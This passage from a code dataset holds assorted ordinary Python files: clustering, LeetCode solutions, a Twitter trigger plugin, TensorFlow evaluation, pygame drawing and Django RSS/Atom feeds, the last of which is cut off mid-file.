hrstrng.replace(hrstrng[0:2],format(i +1,'02d'))\r\n# =============================================================================\r\n\r\n if i<10 & i+1>=10:\r\n hrstrng = '0'+ hrstrng\r\n \r\n \r\n# =============================================================================\r\n# if i+1 < 10:\r\n# nhr= '0' + nhr\r\n# =============================================================================\r\n \r\n \r\n print(hrstrng)\r\n \r\n df = dtrang.loc[(dtrang.Time >= hrstrng) & (dtrang.Time <= nhr)]\r\n \r\n \r\n #AP\r\n #X= df.loc[df.index>90000,['Position','Count']].to_numpy()\r\n X = df.to_numpy()\r\n X = X[:,[2, 6]]\r\n #Damp_my_default:.88 var: float(fdamping)\r\n af = AffinityPropagation(preference=-50, damping=.8888888, max_iter= 100 ).fit(X)\r\n cluster_centers_indices = af.cluster_centers_indices_\r\n labels = af.labels_\r\n n_clusters_ = len(cluster_centers_indices)\r\n \r\n #Plotting the result\r\n plt.close('all')\r\n plt.figure(1)\r\n plt.clf()\r\n plt.scatter(df.Position, df.Count, color='c', linewidth=4)\r\n colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\r\n\r\n for k, col in zip(range(n_clusters_), colors):\r\n class_members = labels == k\r\n cluster_center = X[cluster_centers_indices[k]]\r\n #plot branches\r\n plt.plot(X[class_members, 0], X[class_members, 1], col + '.', markersize=10)\r\n plt.plot(cluster_center[0], cluster_center[1], 'o', markerfacecolor=col,\r\n markeredgecolor='k', markersize=15)\r\n \r\n #plot:lines between branches\r\n for x in X[class_members]:\r\n plt.plot([cluster_center[0], x[0]], [cluster_center[1], x[1]], col)\r\n \r\n plt.title('Estimated number of clusters: %d' % n_clusters_)\r\n plt.xlabel('Postions',labelpad=15)\r\n plt.ylabel('Number of people')\r\n \r\n frame =plt.gca()\r\n frame.axes.get_xaxis().set_visible(True)\r\n frame.axes.get_yaxis().set_visible(True)\r\n \r\n #x and y axis values\r\n plt.ylim(-0.7,5)\r\n \r\n plt.xticks([1,2,3,4,5,6], [\"Level 2-1\", \"Level 3-2\\nCentral\", \"Level 4-3\\nNorth\",\r\n \"Level4-3\\nSouth\", \"Level5-4\\nNorth\", \"Level5-4\\nSouth\"])\r\n \r\n plt.show()\r\n \r\n \r\n #save the result in the excel file\r\n exc = pd.DataFrame(X[cluster_centers_indices], columns= ['Position','Count']).T\r\n #change the row and colomns directions\r\n exc = exc.transpose()\r\n #add pandas data to excisting csv file mode a is append\r\n \r\n exc.to_csv( \"micro_cluster_data.csv\", mode='a', header = False)\r\n # exc.drop(exc[], inplace=True, axis=1)\r\n #exc = exc.drop(1, axis=1)\r\n \r\n \r\n\r\n ################################################################################\r\n \r\n\"\"\"\r\nStage 2: Macro clustering:\r\n Generating Macro based on the prev level:Micro Clustering\r\n Save in the seprate csv file \r\n\"\"\"\r\n \r\n \r\nmac = pd.read_csv(\"micro_cluster_data.csv\", header=None)\r\n#X= mac.loc[mac.index<90000,['Position','Count']].to_numpy()\r\nmac = mac.to_numpy()\r\nmac =np.delete(mac,0,axis=1)\r\n#X = X.astype(float )\r\n#X = X[:,[1, 2]]\r\n#X = np.array(X)\r\naaf = AffinityPropagation(preference=-50, damping=.8666, max_iter= 100 ).fit(mac)\r\n#87-833\r\ncluster_centers_indices = aaf.cluster_centers_indices_\r\nlabels = aaf.labels_\r\n#week1=.6\r\n#wek3=77\r\nn_clusters_ = len(cluster_centers_indices)\r\n\r\n\r\n#plot\r\nplt.close('all')\r\nplt.figure(1)\r\nplt.clf()\r\nplt.scatter(mac[:,1], mac[:,0], linewidth=3,facecolors='none', s=120, edgecolor=\"silver\")\r\ncolors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\r\n\r\nfor k, col in zip(range(n_clusters_), colors):\r\n class_members = labels == k\r\n cluster_center = mac[cluster_centers_indices[k]]\r\n #plt.plot(X[class_members, 0], X[class_members, 1], col + '+', markersize=8)\r\n plt.plot(cluster_center[1], cluster_center[0], '+', markerfacecolor=col,\r\n markeredgecolor='crimson', markersize=40 )\r\n \r\n \r\n#plt.title('Estimated number of clusters for Macro Clustering: %d' % n_clusters_)\r\nplt.title('%d' % n_clusters_)\r\n\r\nplt.xlabel('Postions',labelpad=15)\r\nplt.ylabel('Number of people')\r\n\r\nframe =plt.gca()\r\nframe.axes.get_xaxis().set_visible(True)\r\nframe.axes.get_yaxis().set_visible(True)\r\n\r\nplt.ylim(-0.7,50)\r\n\r\nplt.xticks([1,2,3,4,5,6], [\"Level 2-1\", \"Level 3-2\\nCentral\", \"Level 4-3\\nNorth\",\r\n \"Level4-3\\nSouth\", \"Level5-4\\nNorth\", \"Level5-4\\nSouth\"])\r\n\r\nplt.show()\r\n\r\nexc_my = pd.DataFrame(X[cluster_centers_indices], columns= ['Position','Count']).T\r\n#change the row and colomns directions\r\nexc_my = exc_my.transpose()\r\nexc_my.to_csv( \"macro_cluster_data.csv\",index =False)\r\n\r\n\r\n\r\n\r\n","sub_path":"Micro_Macro_clustering/AP_micro¯o_V2.py","file_name":"AP_micro¯o_V2.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"86502790","text":"\"\"\"\nTopics: | Hash Table | Two Pointers | String\n\"\"\"\n\nclass Solution:\n\n def lengthOfLongestSubstring(self, string):\n \"\"\"\n Time: O(n)\n Space: O(k)\n\n [k = length of the longest substring w/o repeating characters]\n \"\"\"\n longest = 0\n left, right = 0, 0\n chars = set()\n while left < len(string) and right < len(string):\n if string[right] not in chars:\n chars.add(string[right])\n right += 1\n longest = max(longest, right - left)\n else:\n chars.remove(string[left])\n left += 1\n return longest\n","sub_path":"LeetCode/src/003 - Longest Substring Without Repeating Characters.py","file_name":"003 - Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"426581299","text":"import komand\nimport time\nfrom .schema import UserInput, UserOutput\n\n# Custom imports below\nfrom komand_twitter.util import util\n\n\nclass User(komand.Trigger):\n\n # Constants\n CACHE_FILE_NAME = \"triggers_twitter_user\"\n MAX_TWEET_COUNT = 100 # Max amount supported by Twitter.\n\n interval = util.Common.SleepDuration.HIGH_ACTIVITY # Default to high\n cache_file = None\n cached_id = 0 # The latest ID from the previous fetch.\n\n screen_name = None # The required screen_name of the user to search for\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"user\",\n description=\"Monitor for tweets from a given screen name\",\n input=UserInput(),\n output=UserOutput(),\n )\n\n def run(self, params={}):\n if not self.connection.client:\n assert \"Run: Twitter API client was None.\" # noqa: B101\n raise Exception(\"Run: Twitter API client was None.\")\n\n self.screen_name = params.get(\"screen_name\")\n if not self.screen_name:\n assert \"Run: screen_name parameter was empty. Make sure input is marked required.\" # noqa: B101\n raise Exception(\"Run: screen_name parameter was empty. Make sure input is marked required.\")\n\n # Make doubly sure it defaults to the original value, just in case?\n self.interval = params.get(\"interval\", util.Common.SleepDuration.HIGH_ACTIVITY)\n # Open and auto-close the file to create the cache file on very first start up\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n self.logger.info(\"Run: Got or created cache file: {file}\".format(file=cache_file))\n\n while True:\n self.logger.info(\"Run: Iterating main loop\")\n\n # Open cache file and read the latest ID from the previous fetch.\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n self.cached_id = cache_file.readline()\n\n self.logger.info(\"Run: Cached id is {id}.\".format(id=self.cached_id))\n\n tweets = self.get_timeline()\n\n if len(tweets) > 0: # Only trigger if tweets exist.\n self.trigger_on_tweets(tweets=tweets)\n self.logger.info(\"Run: Trigger done. Sleeping {seconds} seconds.\".format(seconds=self.interval))\n else:\n self.logger.info(\"Run: No new tweets. Sleeping {seconds} seconds.\".format(seconds=self.interval))\n\n time.sleep(self.interval)\n\n \"\"\"Fetches new tweets from Twitter based on the pattern supplied and then sets the sleep time appropriately.\"\"\"\n\n def get_timeline(self):\n tweets = self.connection.client.GetUserTimeline(\n screen_name=self.screen_name, since_id=self.cached_id, count=self.MAX_TWEET_COUNT\n )\n tweet_count = len(tweets)\n self.logger.info(\"Get Tweets: Got {count} tweets.\".format(count=tweet_count))\n\n return tweets\n\n \"\"\"Takes a list of tweets and sends triggers for them. Writes the first ID (latest) to cache file.\"\"\"\n\n def trigger_on_tweets(self, tweets):\n for index, tweet in enumerate(tweets):\n if index == 0:\n # Write this ID to cache file since it is most up-to-date\n with komand.helper.open_cachefile(self.CACHE_FILE_NAME + \"_\" + self.screen_name) as cache_file:\n cache_file.write(str(tweet.id))\n\n self.logger.info(\"Trigger On Tweets: Sending trigger for tweet {id}.\".format(id=tweet.id))\n payload = self.create_trigger_payload(tweet)\n self.send(payload)\n\n \"\"\"Creates a a payload to send from a tweet.\"\"\"\n\n def create_trigger_payload(self, tweet):\n msg = tweet.text.encode(\"ascii\", \"ignore\")\n user = tweet.user.screen_name.encode(\"ascii\", \"ignore\")\n url = \"{base_url}/{screen_name}/status/{post_id}\".format(\n base_url=self.connection.TWITTER_URL, screen_name=user, post_id=tweet.id\n )\n payload = {\"msg\": msg, \"url\": url, \"user\": user}\n self.logger.info(\"Create Trigger Payload: Created {payload}\".format(payload=payload))\n return payload\n\n def test(self, params={}):\n \"\"\"TODO: Test the trigger\"\"\"\n return {}\n","sub_path":"plugins/twitter/komand_twitter/triggers/user/trigger.py","file_name":"trigger.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356955409","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport os\r\nimport time\r\nimport datetime\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nfrom tensorflow.contrib import learn\r\nimport gflags\r\nimport data_helpers\r\nfrom text_cnn import TextCNN\r\n\r\n\r\n### parameters ###\r\n# ===============================================\r\n\r\nFLAGS = gflags.FLAGS\r\n\r\n# data loading parameters\r\ngflags.DEFINE_string('positive_data_file', './inputs/rt.pos', 'Data source for positive data.')\r\ngflags.DEFINE_string('negative_data_file', './inputs/rt.neg', 'Data source for negative data.')\r\n\r\n# evaluate parameters\r\ngflags.DEFINE_integer('batch_size', 64, 'Batch size (default: 64).')\r\ngflags.DEFINE_string('checkpoint_dir', './', 'Checkpoint directory from the training.')\r\ngflags.DEFINE_bool('eval_train', True, 'Evalute on all the training data.')\r\n\r\n# device parameters\r\ngflags.DEFINE_bool('allow_soft_placement', True, 'Allow device soft device placement.')\r\ngflags.DEFINE_bool('log_device_placement', False, 'Log placement of ops on devices.')\r\n\r\nFLAGS(sys.argv)\r\n# show parameters\r\nprint('\\nPARAMETERS:')\r\nprint('================================')\r\nfor attr, value in FLAGS.flag_values_dict().items():\r\n print('{0}: {1}'.format(attr.upper(), value))\r\nprint('================================\\n\\n')\r\ninput('press enter to start...\\n\\n')\r\n\r\n\r\n# load the train data or your own data.\r\nif FLAGS.eval_train is True:\r\n x_text, y_test = data_helpers.load_text_and_label(file_pos_file=FLAGS.positive_data_file, file_neg_file=FLAGS.negative_data_file)\r\n y_test = np.argmax(y_test, axis=1)\r\nelse:\r\n x_text = ['it is so bad.', 'nice buying experience.']\r\n y_test = [0, 1]\r\n\r\n# load the vocabulary\r\nvocab_path = os.path.join(FLAGS.checkpoint_dir, '..', 'vocab')\r\nvocab_prosessor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\r\nx_test = np.array(list(vocab_prosessor.transform(x_text)))\r\n\r\nprint('Evaluating ...\\n')\r\n\r\n### evaluating\r\n# ===============================================\r\n\r\ncheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\r\nprint('Loaded the latest checkpoint: <{}>\\n'.format(checkpoint_file))\r\n\r\ngraph = tf.Graph()\r\nwith graph.as_default():\r\n session_conf = tf.ConfigProto(\r\n allow_soft_placement=FLAGS.allow_soft_placement,\r\n log_device_placement=FLAGS.log_device_placement)\r\n sess = tf.Session(config=session_conf)\r\n with sess.as_default():\r\n # Load the saved meta graph and restore variables\r\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\r\n saver.restore(sess, checkpoint_file)\r\n\r\n # Get the placeholders from the graph by name\r\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\r\n # input_y = graph.get_operation_by_name(\"input_y\").outputs[0]\r\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\r\n\r\n # Tensors we want to evaluate\r\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\r\n\r\n # Generate batches for one epoch\r\n batches = data_helpers.batch_iter(list(x_test), FLAGS.batch_size, 1, shuffle=False)\r\n\r\n # Collect the predictions\r\n all_predictions = []\r\n for x_test_batch in batches:\r\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\r\n all_predictions = np.concatenate([all_predictions, batch_predictions])\r\n\r\n# Print accuracy if y_test is defined\r\nif y_test is not None:\r\n correct_predictions = float(sum(all_predictions == y_test))\r\n print(\"\\nTotal number of test examples: {}\".format(len(y_test)))\r\n print(\"Accuracy: {:g}\\n\".format(correct_predictions/float(len(y_test))))\r\n\r\n# Save the evaluation to a csv\r\ndf_pred = np.column_stack((np.array(x_text), all_predictions))\r\nout_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"prediction.csv\")\r\nprint(\"Saving prediction csv file to {0}\".format(out_path))\r\npd.DataFrame(df_pred).to_csv(out_path, header=['text', 'prediction'])\r\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"95973942","text":"a='g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr\\'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. lmu ynnjw ml rfc spj.'\n\n\n\ndef convert(char):\n if ord(char)+2>ord('z'):\n return ((ord(char)+1)%ord('z'))+ord('a')\n else:\n return ord(char)+2\ndef alphaCheck(string,i):\n if(string[i].isalpha()):\n return chr(convert(string[i]))\n else:\n return string[i]\ndef run(string):\n b=''\n for i in range(len(string)):\n tmp=alphaCheck(string,i)\n b+=tmp;\n print(b)\n\nrun(a)\n\n\n\nc='map'\nrun(c)\n","sub_path":"venv/PythonChallenge_01.py","file_name":"PythonChallenge_01.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"598686885","text":"\"\"\"\nPrint a Rectangle\nDraw a rectangle which has a height of H cm and a width of W cm. Draw a 1-cm square by single '#'.\n\nInput\nThe input consists of multiple datasets. Each dataset consists of two integers H and W separated by a single space.\n\nThe input ends with two 0 (when both H and W are zero).\n\nOutput\nFor each dataset, print the rectangle made of H × W '#'.\n\"\"\"\nwhile True:\n H, W = map(int, input().split())\n\n if H == 0 and W == 0:\n break\n for i in range(H):\n print('#' * W)\n print()\n","sub_path":"ITP1/ITP_1_5_A.py","file_name":"ITP_1_5_A.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"407802719","text":"\"\"\"\nConfiguration\n-------------\n\"\"\"\n\nimport os\n\nfrom six.moves.configparser import (\n SafeConfigParser,\n NoSectionError,\n NoOptionError\n)\n\n\nDEFAULT_CONFIG_FILES = ['.moreliarc', '~/.moreliarc', '/etc/morelia.rc']\n\n\ndef expand_all(path):\n \"\"\"Expand path.\"\"\"\n return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))\n\n\nclass Config(object):\n \"\"\"Configuration object.\n\n Configuration is read from ini-style files and environment variables\n prefixed with `MORELIA_`.\n By default Morelia search for files:\n\n * .moreliarc\n * ~/.moreliarc\n * /etc/morelia.rc\n \"\"\"\n\n def __init__(self, config_files=None, config_parser_class=None):\n self._env_prefix = 'MORELIA_'\n self._items = {\n 'tags': None,\n 'formatter': None,\n 'matchers': None,\n 'show_all_missing': False,\n }\n if config_files is None:\n config_files = DEFAULT_CONFIG_FILES\n self._default_section = 'morelia'\n self._config_files = [expand_all(config_file)\n for config_file in config_files]\n if config_parser_class is None:\n config_parser_class = SafeConfigParser\n self._config_parser_class = config_parser_class\n\n def load(self):\n \"\"\"Load configuration.\"\"\"\n self._update_from_file()\n self._update_from_environ()\n\n def _update_from_file(self):\n \"\"\"Update config on settings from *.ini file.\"\"\"\n config_parser = self._config_parser_class()\n config_parser.read(self._config_files)\n for key in self._items.keys():\n try:\n value = config_parser.get('morelia', key)\n except (NoOptionError, NoSectionError):\n pass\n else:\n self._items[key] = value\n\n def _update_from_environ(self):\n \"\"\"Update config on environment variables.\"\"\"\n for key in self._items.keys():\n try:\n value = os.environ[self._env_prefix + key.upper()]\n except KeyError:\n pass\n else:\n self._items[key] = value\n\n def get_tags_pattern(self):\n \"\"\"Return tags pattern.\"\"\"\n tags = self._items.get('tags', '')\n return tags if tags is not None else ''\n\n\ndef get_config(_memo={}):\n \"\"\"Return config object.\"\"\"\n try:\n return _memo['config']\n except KeyError:\n config = Config()\n config.load()\n _memo['config'] = config\n return _memo['config']\n","sub_path":"morelia/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"427197789","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 11 14:50:43 2020\r\n\r\n@author: USER\r\n\"\"\"\r\n\r\nimport time\r\nimport random\r\nfrom mcpi.minecraft import Minecraft\r\nmc=Minecraft.create()\r\ntime.sleep(1)\r\nx,y,z=mc.player.getTilePos()\r\nwhile True:\r\n colour=random.randrange(0,16)\r\n mc.setBlocks(x+25,y-1,z+25,x-25,y-1,z-25,95,colour)\r\n time.sleep(0.5)","sub_path":"untitled2.py","file_name":"untitled2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486533114","text":"class Solution:\n def maxDistance(self, grid: List[List[int]]) -> int:\n res = -1\n stack = []\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n stack.append([i, j])\n if len(stack) == 0 or len(stack) == len(grid) * len(grid[0]):\n return res\n directions = [[1, 0], [-1, 0], [0, 1], [0, -1]]\n while stack:\n new_stack = []\n while stack:\n [i, j] = stack.pop()\n for direction in directions:\n x, y = i + direction[0], j + direction[1]\n if 0 <= x < len(grid) and 0 <= y < len(grid[0]) and grid[x][y] == 0:\n grid[x][y] = \"#\"\n new_stack.append([x, y])\n stack = new_stack\n res += 1\n return res\n","sub_path":"BFS/1162. As Far from Land as Possible.py","file_name":"1162. As Far from Land as Possible.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45914859","text":"\nimport sys\nfrom unittest import mock\n\nfrom importlib import import_module, reload\n\nimport pytest\n\nextra_checks = {\n 'tensorflow': [\n 'wellcomeml.ml.attention',\n 'wellcomeml.ml.bert_semantic_equivalence',\n 'wellcomeml.ml.bilstm',\n 'wellcomeml.ml.cnn',\n 'wellcomeml.ml.keras_utils',\n # 'wellcomeml.ml.keras_vectorizer',\n # Not working properly yet - reloading the module causes a different errot han ImportError\n 'wellcomeml.ml.similarity_entity_liking'\n ],\n 'torch': [\n # 'wellcomeml.ml.bert_vectorizer',\n # Not working properly yet - reloading the module causes a different error than ImportError\n 'wellcomeml.ml.spacy_classifier',\n 'wellcomeml.ml.similarity_entity_liking',\n # 'wellcomeml.ml.bert_semantic_equivalence'\n ],\n 'spacy': [\n 'wellcomeml.ml.spacy_classifier',\n 'wellcomeml.ml.spacy_entity_linking',\n 'wellcomeml.ml.spacy_knowledge_base'\n ]\n}\n\nmodule_extra_pairs = [\n (module_name, extra_name)\n for extra_name, module_name_list in extra_checks.items()\n for module_name in module_name_list\n]\n\n\n@pytest.mark.extras\n@pytest.mark.parametrize(\"module_name,extra_name\", module_extra_pairs)\ndef test_dependencies(module_name, extra_name):\n \"\"\" Tests that importing the module, in the absence of the extra, throws an error \"\"\"\n\n with mock.patch.dict(sys.modules, {extra_name: None}):\n with pytest.raises(ImportError):\n _tmp_module = import_module(module_name)\n if module_name in sys.modules:\n reload(_tmp_module)\n","sub_path":"tests/test_extras.py","file_name":"test_extras.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538685242","text":"from constants import *\n\n\ndef draw_menu(win, font_small, font_normal, font_ns, font_huge, logo, best_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран мен.\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. шрифты из main\n logo - файл logo.png\n best_time - лучшее время за сессию\"\"\"\n telerun_txt = font_huge.render('TELERUN', True, (0, 137, 204))\n win.blit(telerun_txt, [0.46 * win_w, 0.3 * win_h])\n\n press_txt = font_ns.render('Попробуйте соединиться с сервером', True, (0, 137, 204))\n win.blit(press_txt, [0.13 * win_w, 0.6 * win_h])\n press_txt = font_ns.render('и обойти все блокировки РКН', True, (0, 137, 204))\n win.blit(press_txt, [0.2 * win_w, 0.65 * win_h])\n press_txt = font_normal.render('Нажмите ENTER для старта...', True, (0, 137, 204))\n win.blit(press_txt, [0.13 * win_w, 0.8 * win_h])\n\n bestt_txt = font_small.render('Лучшее время: ' + str(round(best_time, 1)) + 'С', True, (0, 137, 204))\n win.blit(bestt_txt, [10 * scaling, 0.93 * win_h])\n\n win.blit(logo, (int(145 * scaling), int(108 * scaling)))\n\n\ndef draw_go(win, font_small, font_normal, font_huge, game_time, best_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран 'GAME OVER'\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. шрифты из main\n game_time - время завершенной игры\n best_time - лучшее время за сессию\"\"\"\n go_txt = font_huge.render('Соединение разорвано', True, (0, 137, 204))\n go_rec = go_txt.get_rect()\n go_rec.center = (win_w / 2, win_h / 3)\n win.blit(go_txt, go_rec)\n\n yres_txt = font_normal.render('Ваш результат: ' + str(round(game_time, 1)) + 'С', True, (0, 137, 204))\n yres_rec = yres_txt.get_rect()\n yres_rec.center = (win_w / 2, win_h / 3 + 100 * scaling)\n bestres_txt = font_normal.render('Лучший результат: ' + str(round(best_time, 1)) + 'С', True, (0, 137, 204))\n bestres_rec = bestres_txt.get_rect()\n bestres_rec.center = (win_w / 2, win_h / 3 + 150 * scaling)\n win.blit(yres_txt, yres_rec)\n win.blit(bestres_txt, bestres_rec)\n\n rest_txt = font_small.render('Нажмите ENTER для повторного соединения', True, (0, 137, 204))\n rest_rec = rest_txt.get_rect()\n rest_rec.center = (win_w / 2, 2 * win_h / 3 + 50 * scaling)\n\n back_txt1 = font_small.render('Нажмите SPACE', True, (0, 137, 204))\n back_rec1 = back_txt1.get_rect()\n back_rec1.center = (win_w / 2, 2 * win_h / 3 + 110 * scaling)\n\n back_txt2 = font_small.render('для паузы', True, (0, 137, 204))\n back_rec2 = back_txt2.get_rect()\n back_rec2.center = (win_w / 2, 2 * win_h / 3 + 150 * scaling)\n\n win.blit(rest_txt, rest_rec)\n win.blit(back_txt1, back_rec1)\n win.blit(back_txt2, back_rec2)\n\n\ndef draw_pause(win, font_small, font_normal, font_huge, game_time):\n \"\"\"Процедура, при вызове которой отрисовывается экран паузы\n Аргументы:\n win - окно отрисовки\n font_small, font_normal, font_hugу - соотв. шрифты из main\n game_time - время завершенной игры\"\"\"\n go_txt = font_huge.render('ПАУЗА', True, (0, 137, 204))\n go_rec = go_txt.get_rect()\n go_rec.center = (win_w / 2, win_h / 3)\n win.blit(go_txt, go_rec)\n\n yres_txt = font_normal.render('Ваше время: ' + str(round(game_time, 1)) + 'С', True, (0, 137, 204))\n yres_rec = yres_txt.get_rect()\n yres_rec.center = (win_w / 2, win_h / 3 + 100 * scaling)\n win.blit(yres_txt, yres_rec)\n\n res_txt = font_small.render('Нажмите ENTER ��ля продолжения...', True, (0, 137, 204))\n res_rec = res_txt.get_rect()\n res_rec.center = (win_w / 2, 2 * win_h / 3 + 50 * scaling)\n win.blit(res_txt, res_rec)\n\n\ndef draw_plane(win, x, y, plane, plane_dmg, vulnerable):\n \"\"\"Процедура, при вызове которой отрисовывается самолётик\n Аргументы:\n win - окно отрисовки\n x - координата самолётика по оси Х (верхний левый угол)\n y - координата самолётика по оси Y (верхний левый угол)\n plane - файл plane.png (обычный самолётик)\n plane_png - файл plane_dmg.png (самолётик после ранения)\n vulnerable - флаг, говорящий о том уязвим самолётик или нет\"\"\"\n if vulnerable: # Рисуем самолётик\n win.blit(plane, (x, y))\n else:\n win.blit(plane_dmg, (x, y))\n\n\ndef lives_counter(win, font, lives):\n \"\"\"Процедура, при вызове которой отрисовывается текущее количество жизней\n Аргументы:\n win - окно отрисовки\n font - шрифт\n lives - переменная, отвечающая за количество жизней\"\"\"\n lives_txt = font.render(lives * \"*\", True, (0, 137, 204))\n win.blit(lives_txt, (10 * scaling, 10 * scaling))\n\n\ndef print_time(win, font, time):\n \"\"\"Процедура, при вызове которой отрисовывается время текущей игры\n Аргументы:\n win - окно отрисовки\n font - шрифт\n time - переменная, отвечающая за отсчет времени\"\"\"\n time_txt = font.render(str(round(time, 1)) + \" С\", True, (0, 137, 204))\n time_rec = time_txt.get_rect()\n time_rec.center = (win_w / 2, 27 * scaling)\n win.blit(time_txt, time_rec)\n","sub_path":"painting.py","file_name":"painting.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"4190617","text":"\"\"\"RSS and Atom feeds for the reader app.\"\"\"\n\nfrom __future__ import annotations\n\nfrom mimetypes import guess_type\nfrom typing import TYPE_CHECKING, Iterable, Optional\n\nfrom django.conf import settings\nfrom django.contrib.syndication.views import Feed\nfrom django.db.models import F, Prefetch\nfrom django.utils import timezone as tz\nfrom django.utils.decorators import method_decorator\nfrom django.utils.feedgenerator import Atom1Feed\nfrom django.views.decorators.cache import cache_control\n\nfrom .models import Category, Chapter, Series\n\nif TYPE_CHECKING: # pragma: no cover\n from datetime import datetime # isort:skip\n from django.http import HttpRequest # isort:skip\n\n_max = settings.CONFIG['MAX_RELEASES']\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass LibraryRSS(Feed):\n \"\"\"RSS feed for the series library.\"\"\"\n ttl = 600\n link = '/reader/'\n description = 'Updates when a new series is added'\n author_name = settings.CONFIG['NAME']\n title = f'Library - {author_name}'\n item_guid_is_permalink = True\n\n def items(self) -> Iterable[Series]:\n \"\"\"\n Get an iterable of the feed's items.\n\n :return: An iterable of ``Series`` objects.\n \"\"\"\n categories = Category.objects.only('name')\n return Series.objects.only(\n 'slug', 'title', 'description',\n 'cover', 'created', 'modified'\n ).prefetch_related(\n Prefetch('categories', queryset=categories)\n ).order_by('-created')[:_max]\n\n def item_description(self, item: Series) -> str:\n \"\"\"\n Get the description of the item.\n\n :param item: A ``Series`` object.\n\n :return: The description of the series.\n \"\"\"\n return item.description.replace('\\n', '
')\n\n def item_categories(self, item: Series) -> Iterable[str]:\n \"\"\"\n Get the categories of the item.\n\n :param item: A ``Series`` object.\n\n :return: The names of the series' categories.\n \"\"\"\n return [c.name for c in item.categories.all()]\n\n def item_pubdate(self, item: Series) -> datetime:\n \"\"\"\n Get the publication date of the item.\n\n :param item: A ``Series`` object.\n\n :return: The date the series was created.\n \"\"\"\n return item.created\n\n def item_updateddate(self, item: Series) -> datetime:\n \"\"\"\n Get the update date of the item.\n\n :param item: A ``Series`` object.\n\n :return: The date the series was modified.\n \"\"\"\n return item.modified\n\n def item_enclosure_url(self, item: Series) -> Optional[str]:\n \"\"\"\n Get the enclosure URL of the item.\n\n :param item: A ``Series`` object.\n\n :return: The URL of the series' cover image, if available.\n \"\"\"\n return item.cover.url if item.cover else None\n\n def item_enclosure_length(self, item: Series) -> Optional[int]:\n \"\"\"\n Get the enclosure length of the item.\n\n :param item: A ``Series`` object.\n\n :return: The size of the series' cover image, if available.\n \"\"\"\n return item.cover.size if item.cover else None\n\n def item_enclosure_mime_type(self, item: Series) -> Optional[str]:\n \"\"\"\n Get the enclosure type of the item.\n\n :param item: A ``Series`` object.\n\n :return: The mime type of the series' cover image, if available.\n \"\"\"\n return guess_type(item.cover.path)[0] if item.cover else None\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass LibraryAtom(LibraryRSS):\n \"\"\"Atom feed for the series library.\"\"\"\n feed_type = Atom1Feed\n subtitle = LibraryRSS.description\n\n\n@method_decorator(cache_control(public=True, max_age=600), '__call__')\nclass ReleasesRSS(Feed):\n \"\"\"RSS feed for chapter releases.\"\"\"\n ttl = 600\n author_name = settings.CONFIG['NAME']\n item_guid_is_permalink = True\n\n def get_object(self, request: HttpRequest, slug:\n Optional[str] = None) -> Optional[Series]:\n \"\"\"\n Get a ``Series`` object from the request.\n\n :param request: The original request.\n :param slug: The slug of the series.\n\n :return: The series that has the given slug,\n or ``None`` if the slug is ``None``.\n \"\"\"\n if slug is None:\n return None\n chapters = Chapter.objects.only(\n 'title', 'volume', 'number',\n 'published', 'modified', 'series'\n ).filter(\n published__lte=tz.now(),\n series__licensed=False\n ).order_by(F('volume').asc(nulls_last=True), 'number')\n return Series.objects.only(\n 'slug', 'title', 